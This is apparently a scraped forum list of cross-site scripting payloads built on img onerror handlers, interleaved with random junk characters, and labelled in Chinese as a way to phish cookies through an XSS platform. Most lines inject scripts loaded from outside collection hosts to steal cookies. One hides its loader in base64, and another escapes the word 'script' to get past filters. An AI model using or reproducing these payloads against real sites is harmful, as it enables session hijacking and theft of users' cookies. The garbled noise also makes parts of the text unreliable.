<img src='non-exist.jpg'onerror="alert('xss')">
! n0 g; l+ M# ~8 B<img src=# onerror=alert(123)>
! C9 e6 c& h/ n+ [% p<img src=# onerror=alert(document.cookie)>8 z( f1 z2 g0 i2 W0 p& v
下面是利用平台钓cookie的
' b& D0 |# a+ K2 F/ E <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>* p& E% m3 O1 z# L- L
$ `3 E7 m( o( ]9 K
" Z. N+ A9 M3 _1 I, D c<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
3 ^4 ~: F/ x& z' d$ S* {( J A7 m<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
7 c | n: C' R“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
; J: N. f' k0 W. X# U<img src=1 onerror=jQuery.getScript("//xss.re/974")>
) Q, r! l. i$ \9 S+ E @<img src="#">' O0 M; c2 x; r& E. s
<img src="#">
1 i7 ?6 _7 y* s<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>. W+ H9 @& S" J$ r# n) B, {
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
; a3 W- S2 O' P' V: I8 b1 \- s<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>( m) o# \4 a4 e/ D) W$ |
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
2 \! W9 k/ W1 n9 U. B<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
+ T6 C- k) d2 c<img src=x width="0" height="0"></img>
( p' h, X( {4 d+ ]/ y3 B<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
3 f, U6 P. R/ [ x! t8 c" A<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>. Q8 r5 t/ \8 f; u; d: i! v
|